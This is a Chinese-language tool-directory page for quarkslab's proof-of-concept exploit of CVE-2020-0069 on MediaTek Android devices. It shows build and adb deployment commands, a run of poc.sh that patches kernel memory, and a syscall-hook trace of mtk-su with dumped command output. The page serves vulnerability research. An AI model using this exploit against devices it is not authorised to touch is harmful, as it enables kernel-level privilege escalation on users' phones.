Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-0069_poc — 针对联发科安卓设备上CVE-2020-0069的概念验证漏洞利用,可实现内核内存读写与系统调用挂钩,从而进行权限提升。 | Kitploit
工具/GitHubGitHub/quarkslab/cve-2020-0069_poc
Android安全权限提升漏洞利用移动安全二进制利用
GitHubquarkslab/cve-2020-0069_poc

CVE-2020-0069_poc

针对联发科安卓设备上CVE-2020-0069的概念验证漏洞利用,可实现内核内存读写与系统调用挂钩,从而进行权限提升。

查看仓库
1092636年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

描述

本仓库包含我们在小米 Redmi 6a(搭载联发科 MT6762M SoC)上研究 CVE-2020-0069 时使用的材料。

共有三个程序:

  • kernel_rw.c 一个允许读写内核内存的 C 程序
  • poc.sh 一个 shell 脚本
  • syscall_hook.c 一个可用于跟踪 mtk-su 程序的 C 库(已在版本 19 上测试)

构建

要构建二进制文件:

root@kitploit:~
$ ndk-build

然后将它们推送到设备上:

root@kitploit:~
$ adb push poc.sh /data/local/tmp
$ adb push libs/armeabi-v7a/kernel_rw /data/local/tmp
$ adb push libs/armeabi-v7a/libsyscall_hook.so /data/local/tmp

用法

CVE-2020-0069 PoC

root@kitploit:~
$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l

跟踪 mtk-su

root@kitploit:~
$ mkdir mtk-su
$ LD_PRELOAD=./syscall_hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x53df4000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
exec command (num 2) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-2
[...]
$ cat  mtksu/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40a68000 into reg 17
READ  address reg 17, data reg b
MOVE startPA+0 into reg 17
WRITE  address reg 17, data reg b
[...]
下载工具